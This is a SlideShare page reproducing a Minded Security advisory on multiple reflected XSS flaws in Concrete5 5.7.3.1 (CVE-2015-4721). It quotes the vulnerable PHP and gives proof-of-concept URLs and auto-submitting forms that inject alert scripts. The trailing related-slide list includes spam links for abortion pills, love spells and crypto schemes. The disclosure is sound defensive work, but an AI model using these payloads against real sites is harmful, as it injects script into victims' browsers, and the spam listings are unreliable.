SlideShare une entreprise Scribd logo

Concrete5 Multiple Reflected XSS Advisory

Minded Security
Minded Security

The document describes multiple reflected cross-site scripting (XSS) vulnerabilities identified in Concrete5 version 5.7.3.1. User input passed through various request parameters was not properly sanitized before being used to generate HTML output, allowing attackers to potentially inject arbitrary JavaScript code. The vulnerabilities were addressed in Concrete5 version 5.7.4. The vulnerabilities included issues in files related to page versions, user selection, group searching, language setup, single page loading, and attribute selection.

Logiciels
1  sur  5
Télécharger pour lire hors ligne
Edition: 1.0 Last Edit: 24/06/2015 Cassification: Not restricted Multiple Reflected Cross Site Scripting Vulnerabilities in Concrete5 version 5.7.3.1 Author: Egidio Romano
Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 1/4  Summary Vulnerabilities Class Cross Site Scripting (XSS) CVE ID CVE-2015-4721 Remote Yes Local No Published June 6, 2015 Updated June 24, 2015 Credit Egidio Romano Vulnerable Version 5.7.3.1 and probably prior versions Fixed On 5.7.4 Other References https://hackerone.com/reports/59661 http://blog.mindedsecurity.com/2015/06/multiple- security-issues-discovered-in-concrete5-part1.html  Description Concrete5 is vulnerable to some reflected Cross Site Scripting (XSS) attacks because certain user input is being used within the output it generates without validating or encoding it.  Vulnerabilities Details Following are the reflected XSS vulnerabilities identified:  File: /concrete/views/panels/details/page/versions.php (lines 5-14): <?php foreach($_REQUEST['cvID'] as $cvID) { $tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked); $checked = false; } print $ih->tabs($tabs); foreach($_REQUEST['cvID'] as $cvID) { ?>
Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 2/4 <div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php echo $display?>; height: 100%"> <iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%" width="100%" src="<?php echo REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&amp;cID=<?php echo $_REQUEST['cID']?>" /> User input passed through the “cvID” and “cID” request parameters is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting malicious URLs like these: http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscri pt%3Ealert%28/XSS/%29%3C/script%3E%3C!-- http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/if rame%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E  File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35): public function selectUser($fieldName, $uID = false, $javascriptFunc … $selectedUID = 0; if (isset($_REQUEST[$fieldName])) { $selectedUID = $_REQUEST[$fieldName]; } else if ($uID > 0) { $selectedUID = $uID; } $html = ''; $html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary- selected-item-inner"><strong class="ccm-summary-selected-item-label">'; if ($selectedUID > 0) { $ui = UserInfo::getByID($selectedUID); $html .= $ui->getUserName(); } $html .= '</strong></div>'; $identifier = new ConcreteCoreUtilityServiceIdentifier(); $selector = $identifier->getString(32); $html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' . $selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog- modal="false" dialog-title="' . t('Choose User') . '" href="' . URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>'; $html .= '<input type="hidden" data-form-user-selector-input="' . $selector . '" name="' . $fieldName . '" value="' . $selectedUID . '">';/> User input passed through the “uID” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:
Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 3/4 http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscrip t%3Ealert%28/XSS/%29%3C/script%3E  File: /concrete/elements/group/search.php (lines 4-20): $searchRequest = $_REQUEST; $result = Loader::helper('json')->encode($controller->getSearchResultObject()- >getJSONObject()); $tree = GroupTree::get(); $guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID); $registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID); ?> <style type="text/css"> div[data-search=groups] form.ccm-search-fields { margin-left: 0px !important; } </style> <div data-search="groups"> <script type="text/template" data-template="search-form"> <form role="form" data-search-form="groups" action="<?php echo URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm- search-fields-none"> <input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" /> User input passed through the “filter” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this: http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3 C/script%3E  URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon User input passed through the “msCountry” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this: <html> <body> <form method="POST" action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon"> <input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'> </form>
Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 4/4 <script>document.forms[0].submit()</script> </body> </html>  URL: http://[host]/index.php/dashboard/pages/single User input passed through the “pageURL” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this: <html> <body> <form method="POST" action="http://[host]/index.php/dashboard/pages/single"> <input type="hidden" name="pageURL" value='"><script>alert(/XSS/)</script>'> </form> <script>document.forms[0].submit()</script> </body> </html>  File: /concrete/attributes/select/form.php (lines 55-60): $vals = $this->post('atSelectNewOption'); if (is_array($vals)) { foreach($vals as $v) { ?> <div class="newAttrValue"> <?php echo $form->hidden($this- >field('atSelectNewOption') . '[]', $v)?> <span class="badge"><?php echo $v?></span> /> User input passed through the “atSelectNewOption” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser.

Recommandé

Concrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE AdvisoryConcrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE Advisory
Minded Security
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014
Giorgio Fedon
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
Mihir Shah
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Richard Peter Ong
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - Introduction
Knoldus Inc.
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWT
Gaurav Roy
 
Secure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web ApplicationsSecure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web Applications
n|u - The Open Security Community
 
OAuth 2
OAuth 2OAuth 2
OAuth 2
ChrisWood262
 

Recommandé

Concrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE AdvisoryConcrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE Advisory
Minded Security
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014
Giorgio Fedon
 
OAuth 2.0
OAuth 2.0OAuth 2.0
OAuth 2.0
Mihir Shah
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Richard Peter Ong
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - Introduction
Knoldus Inc.
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWT
Gaurav Roy
 
Secure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web ApplicationsSecure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web Applications
n|u - The Open Security Community
 
OAuth 2
OAuth 2OAuth 2
OAuth 2
ChrisWood262
 
Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World Bug
Stefano Di Paola
 
Advanced JS Deobfuscation
Advanced JS DeobfuscationAdvanced JS Deobfuscation
Advanced JS Deobfuscation
Minded Security
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!
Luca Carettoni
 
iOS Masque Attack
iOS Masque AttackiOS Masque Attack
iOS Masque Attack
Minded Security
 
Credit Card Fraud - Europe (BCE 2014)
Credit Card Fraud - Europe (BCE 2014)Credit Card Fraud - Europe (BCE 2014)
Credit Card Fraud - Europe (BCE 2014)
Roberto De Sortis - CBCI - QSA
 
Segurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sSegurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`s
Onyo
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
GuardSquare
 
Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...
owaspindia
 
Mobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsMobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, Solutions
Cognizant
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
Denim Group
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS apps
Max Bazaliy
 
I Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingI Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security Testing
Jason Haddix
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application Security
Eryk Budi Pratama
 
The curious case of mobile app security.pptx
The curious case of mobile app security.pptxThe curious case of mobile app security.pptx
The curious case of mobile app security.pptx
Ankit Giri
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
Ajin Abraham
 
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comMobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Idexcel Technologies
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applications
jasonhaddix
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
cclark_isec
 
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Ajin Abraham
 
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
Ajin Abraham
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 

Contenu connexe

En vedette

Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World Bug
Stefano Di Paola
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!
Luca Carettoni
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
GuardSquare
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
Denim Group
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
Ajin Abraham
 

En vedette (20)

Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World Bug
 
Advanced JS Deobfuscation
Advanced JS DeobfuscationAdvanced JS Deobfuscation
Advanced JS Deobfuscation
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!
 
iOS Masque Attack
iOS Masque AttackiOS Masque Attack
iOS Masque Attack
 
Credit Card Fraud - Europe (BCE 2014)
Credit Card Fraud - Europe (BCE 2014)Credit Card Fraud - Europe (BCE 2014)
Credit Card Fraud - Europe (BCE 2014)
 
Segurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sSegurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`s
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
 
Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...
 
Mobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsMobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, Solutions
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS apps
 
I Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingI Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security Testing
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application Security
 
The curious case of mobile app security.pptx
The curious case of mobile app security.pptxThe curious case of mobile app security.pptx
The curious case of mobile app security.pptx
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
 
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comMobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applications
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
 
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
 
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
 

Similaire à Concrete5 Multiple Reflected XSS Advisory

xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdf
yashvirsingh48
 
.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core
.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core
.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core
NETFest
 
ASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CSASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CS
tutorialsruby
 
ASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CSASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CS
tutorialsruby
 

Similaire à Concrete5 Multiple Reflected XSS Advisory (20)

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
Advanced xss
Advanced xssAdvanced xss
Advanced xss
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdf
 
4.Xss
4.Xss4.Xss
4.Xss
 
Client side
Client sideClient side
Client side
 
T3CON13: Web application development using Behaviour Driven Development
T3CON13: Web application development using Behaviour Driven DevelopmentT3CON13: Web application development using Behaviour Driven Development
T3CON13: Web application development using Behaviour Driven Development
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmers
 
MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDB
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in Rails
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
A Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web ApplicationsA Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web Applications
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core
.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core
.NET Fest 2017. Михаил Щербаков. Механизмы предотвращения атак в ASP.NET Core
 
ASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CSASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CS
 
ASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CSASPNET_MVC_Tutorial_06_CS
ASPNET_MVC_Tutorial_06_CS
 

Plus de Minded Security

Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession Learned
Minded Security
 

Plus de Minded Security (12)

Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.
 
Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019
 
Microservices Security: dos and don'ts
Microservices Security: dos and don'tsMicroservices Security: dos and don'ts
Microservices Security: dos and don'ts
 
Live hacking Demo
Live hacking DemoLive hacking Demo
Live hacking Demo
 
Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018
 
Matteo Meucci Isaca Venice - 2017
Matteo Meucci Isaca Venice - 2017Matteo Meucci Isaca Venice - 2017
Matteo Meucci Isaca Venice - 2017
 
BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017
 
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
 
Matteo meucci Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016Matteo meucci Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016
 
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession Learned
 
PHP Object Injection
PHP Object InjectionPHP Object Injection
PHP Object Injection
 

Dernier

%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
masabamasaba
 
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
chiefasafspells
 
Abortion Pill Prices Boksburg [(+27832195400*)] 🏥 Women's Abortion Clinic in ...
Abortion Pill Prices Boksburg [(+27832195400*)] 🏥 Women's Abortion Clinic in ...Abortion Pill Prices Boksburg [(+27832195400*)] 🏥 Women's Abortion Clinic in ...
Abortion Pill Prices Boksburg [(+27832195400*)] 🏥 Women's Abortion Clinic in ...
Medical / Health Care (+971588192166) Mifepristone and Misoprostol tablets 200mg
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
Presentation.STUDIO
 
Abortion Pills In Pretoria ](+27832195400*)[ 🏥 Women's Abortion Clinic In Pre...
Abortion Pills In Pretoria ](+27832195400*)[ 🏥 Women's Abortion Clinic In Pre...Abortion Pills In Pretoria ](+27832195400*)[ 🏥 Women's Abortion Clinic In Pre...
Abortion Pills In Pretoria ](+27832195400*)[ 🏥 Women's Abortion Clinic In Pre...
Medical / Health Care (+971588192166) Mifepristone and Misoprostol tablets 200mg
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Medical / Health Care (+971588192166) Mifepristone and Misoprostol tablets 200mg
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
masabamasaba
 

Dernier (20)

%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
 
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
 
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 
Abortion Pill Prices Boksburg [(+27832195400*)] 🏥 Women's Abortion Clinic in ...
Abortion Pill Prices Boksburg [(+27832195400*)] 🏥 Women's Abortion Clinic in ...Abortion Pill Prices Boksburg [(+27832195400*)] 🏥 Women's Abortion Clinic in ...
Abortion Pill Prices Boksburg [(+27832195400*)] 🏥 Women's Abortion Clinic in ...
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
 
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
 
Abortion Pills In Pretoria ](+27832195400*)[ 🏥 Women's Abortion Clinic In Pre...
Abortion Pills In Pretoria ](+27832195400*)[ 🏥 Women's Abortion Clinic In Pre...Abortion Pills In Pretoria ](+27832195400*)[ 🏥 Women's Abortion Clinic In Pre...
Abortion Pills In Pretoria ](+27832195400*)[ 🏥 Women's Abortion Clinic In Pre...
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
WSO2Con204 - Hard Rock Presentation - Keynote
WSO2Con204 - Hard Rock Presentation - KeynoteWSO2Con204 - Hard Rock Presentation - Keynote
WSO2Con204 - Hard Rock Presentation - Keynote
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
